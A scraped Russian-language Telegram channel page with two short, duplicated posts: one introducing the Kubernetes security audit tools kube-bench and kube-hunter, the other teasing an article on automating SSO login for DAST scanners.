Обзор инструментов для оценки безопасности кластера Kubernetes: kube-bench и kube-hunter
#red_team #k8s
Популярность Kubernetes растет, порог входа снижается, но вопросам безопасности порой оказывают недостаточное внимание. В этой статье разберём работу двух Open Source-утилит для аудита безопасности кластера.
➡️ kube-bench
kube-bench — приложение на Go, которое проверяет, соответствует ли кластер Kubernetes рекомендациям CIS Kubernetes Benchmark. Проект имеет богатую историю (появился на GitHub еще в 2017-м году) и явный спрос у сообщества (почти 4000 звёзд).
Что за CIS (Center for Internet Security)? Это некоммерческая организация, которая занимается вопросами кибербезопасности, основываясь на обратной связи от сообщества. CIS Benchmark, в свою очередь, — это сформулированный список рекомендаций по настройке окружения для защиты от кибератак. Данные рекомендации включают в себя поиск слишком широких прав доступа к файлам конфигурации и небезопасных параметров компонентов кластера, незащищенных учётных записей, проверку сетевых и общих политик.
➡️ kube-hunter
Инструмент kube-hunter написан на Python и также предназначен для поиска уязвимостей в кластере Kubernetes. От предыдущей утилиты отличается тем, что нацелен на оценку защиты кластера с точки зрения «атакующего». Тоже имеет достаточно богатую историю: развивается с 2018 года и получил 3000+ звёзд на GitHub.
Ранее Агентство по национальной безопасности и Агентство по кибербезопасности и защите инфраструктуры США опубликовали совместный отчет — «Руководство по усилению безопасности Kubernetes» (Kubernetes Hardening Guidance).
Это событие получило большой интерес со стороны Kubernetes-сообщества. Вплоть до того, что уже стал доступен первый инструмент для проверки K8s-инсталляций на соответствие требованиям, описанным в этом документе. Он называется Kubescape.
➡️ Читать полностью
🌚 @poxek
#red_team #k8s
Популярность Kubernetes растет, порог входа снижается, но вопросам безопасности порой оказывают недостаточное внимание. В этой статье разберём работу двух Open Source-утилит для аудита безопасности кластера.
kube-bench — приложение на Go, которое проверяет, соответствует ли кластер Kubernetes рекомендациям CIS Kubernetes Benchmark. Проект имеет богатую историю (появился на GitHub еще в 2017-м году) и явный спрос у сообщества (почти 4000 звёзд).
Что за CIS (Center for Internet Security)? Это некоммерческая организация, которая занимается вопросами кибербезопасности, основываясь на обратной связи от сообщества. CIS Benchmark, в свою очередь, — это сформулированный список рекомендаций по настройке окружения для защиты от кибератак. Данные рекомендации включают в себя поиск слишком широких прав доступа к файлам конфигурации и небезопасных параметров компонентов кластера, незащищенных учётных записей, проверку сетевых и общих политик.
Инструмент kube-hunter написан на Python и также предназначен для поиска уязвимостей в кластере Kubernetes. От предыдущей утилиты отличается тем, что нацелен на оценку защиты кластера с точки зрения «атакующего». Тоже имеет достаточно богатую историю: развивается с 2018 года и получил 3000+ звёзд на GitHub.
Ранее Агентство по национальной безопасности и Агентство по кибербезопасности и защите инфраструктуры США опубликовали совместный отчет — «Руководство по усилению безопасности Kubernetes» (Kubernetes Hardening Guidance).
Это событие получило большой интерес со стороны Kubernetes-сообщества. Вплоть до того, что уже стал доступен первый инструмент для проверки K8s-инсталляций на соответствие требованиям, описанным в этом документе. Он называется Kubescape.
Please open Telegram to view this post
VIEW IN TELEGRAM
<Cookie> ctrl+c ctrl+v: автоматизируем прохождение авторизации в DAST
#red_team #appsec #devsecops
Представьте: на дворе 2024 год, вы работаете AppSec-специалистом в российской компании и решаете приобрести готовый сканер DAST, который запускается одной кнопкой. Идет импортозамещение в IT-отрасли, отечественные вендоры создали несколько решений на замену зарубежным. Самые популярные – Solar appScreener, Positive Technologies Black Box и SolidWall DAST. Все они включают опцию прохождения аутентификации по форме на странице.
И тут возникает проблема: у вас SSO или другая user-friendly многостраничная авторизация. А в настройках страница обязательно должна содержать два поля для ввода логина и пароля и одну кнопку. Конечно, можно просто подставить валидные cookie или токен, но тогда готовое решение каждый раз будет просить вас повторно пройти аутентификацию и обновить необходимую информацию для доступа. Согласитесь, выглядит как отличная задача для стажеров вашего отдела.
Статья очень актуальная, свежая и я думаю не только для меня наболевшая тема. Поэтому приятного и полезного прочтения)
➡️ Читать далее
🌚 @poxek
#red_team #appsec #devsecops
Представьте: на дворе 2024 год, вы работаете AppSec-специалистом в российской компании и решаете приобрести готовый сканер DAST, который запускается одной кнопкой. Идет импортозамещение в IT-отрасли, отечественные вендоры создали несколько решений на замену зарубежным. Самые популярные – Solar appScreener, Positive Technologies Black Box и SolidWall DAST. Все они включают опцию прохождения аутентификации по форме на странице.
И тут возникает проблема: у вас SSO или другая user-friendly многостраничная авторизация. А в настройках страница обязательно должна содержать два поля для ввода логина и пароля и одну кнопку. Конечно, можно просто подставить валидные cookie или токен, но тогда готовое решение каждый раз будет просить вас повторно пройти аутентификацию и обновить необходимую информацию для доступа. Согласитесь, выглядит как отличная задача для стажеров вашего отдела.
Статья очень актуальная, свежая и я думаю не только для меня наболевшая тема. Поэтому приятного и полезного прочтения)
Please open Telegram to view this post
VIEW IN TELEGRAM